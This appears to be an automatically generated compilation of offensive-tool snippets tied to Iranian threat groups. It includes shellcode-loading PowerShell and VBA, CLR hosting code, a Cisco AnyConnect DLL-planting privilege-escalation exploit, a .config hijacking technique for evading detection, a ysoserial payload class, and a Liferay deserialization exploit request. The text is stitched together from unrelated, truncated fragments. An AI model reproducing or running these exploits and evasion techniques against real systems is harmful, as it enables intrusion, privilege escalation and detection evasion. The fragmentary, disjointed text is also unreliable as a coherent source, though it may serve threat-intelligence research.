The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:
- APT33
- APT34
- APT39
- Charming Kitten
| <# | |
| https://raw.githubusercontent.com/rasta-mouse/TikiTorch/master/Get-CompressedShellcode.ps1 | |
| #> | |
| function Get-CompressedShellcode | |
| { | |
| [CmdletBinding()] | |
| Param([String]$inFile,[String]$outFile) | |
| $byteArray = [System.IO.File]::ReadAllBytes($inFile) | |
| Write-Verbose "Get-CompressedByteArray" |
| ' Need to add project references to C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscoree.tlb and mscorlib.tlb | |
| Private Declare PtrSafe Function DispCallFunc Lib "oleaut32.dll" (ByVal pv As LongPtr, ByVal ov As LongPtr, ByVal cc As Integer, ByVal vr As Integer, ByVal ca As Long, ByRef pr As Integer, ByRef pg As LongPtr, ByRef par As Variant) As Long | |
| Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (Dst As Any, Src As Any, ByVal BLen As LongPtr) | |
| Private Declare PtrSafe Function VarPtrArray Lib "VBE7" Alias "VarPtr" (ByRef Var() As Any) As LongPtr | |
| #If Win64 Then | |
| Const LS As LongPtr = 8& | |
| #Else | |
| Const LS As LongPtr = 4& |
The following content is generated using a preview release of Swimlane's pyattck.
This snippet of data is scoped to the following actor groups:
| using System; | |
| using System.Diagnostics; | |
| using System.Runtime.InteropServices; | |
| namespace BlockDllTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
Collection of BloodHound Cypher Query Examples
| <# | |
| .Synopsis | |
| This module exploits a path traversal vulnerability in vpndownloader.exe of the Cisco AnyConnect client for Windows | |
| .Description | |
| This module exploits a path traversal vulnerability in vpndownloader.exe of the Cisco AnyConnect client for Windows. | |
| When the -Command argument isn't provided, a DLL is dropped at C:\Program Files\Common Files\microsoft shared\ink\HID.dll. | |
| That path is loaded by the Windows On-Screen Keyboard (osk.exe), which is reachable from the login/lock screen. | |
| Opening the On-Screen Keyboard from that screen therefore loads the planted DLL, running it with LocalSystem privileges. |
We can do this by experimenting with .config files.
Many defenders detect renamed binaries by comparing a file's Original Filename with the running process name.
In this example nothing is renamed, so that check never fires: we simply coerce a trusted, signed application to load our assembly.
We do this by directing the application to read a .config file we provide.
| #include <stdio.h> | |
| #include <Windows.h> | |
| #include <MSCorEE.h> | |
| #include <MetaHost.h> | |
| #include <evntprov.h> | |
| int main() | |
| { | |
| ICLRMetaHost* metaHost = NULL; | |
| IEnumUnknown* runtime = NULL; |
| package ysoserial.payloads; | |
| import com.mchange.lang.ByteUtils; | |
| import org.apache.commons.collections.Transformer; | |
| import org.apache.commons.collections.functors.ChainedTransformer; | |
| import org.apache.commons.collections.functors.ConstantTransformer; | |
| import org.apache.commons.collections.functors.InvokerTransformer; | |
| import org.apache.commons.collections.keyvalue.TiedMapEntry; | |
| import org.apache.commons.collections.map.LazyMap; | |
| import ysoserial.payloads.annotation.Authors; |
| POST /api/jsonws/invoke HTTP/1.1 | |
| Host: <Host> | |
| Connection: close | |
| cmd2: whoami | |
| Content-Type: application/x-www-form-urlencoded | |
| Content-Length: 4912 | |
| cmd={"/expandocolumn/update-column":{}}&p_auth=<valid token>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap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|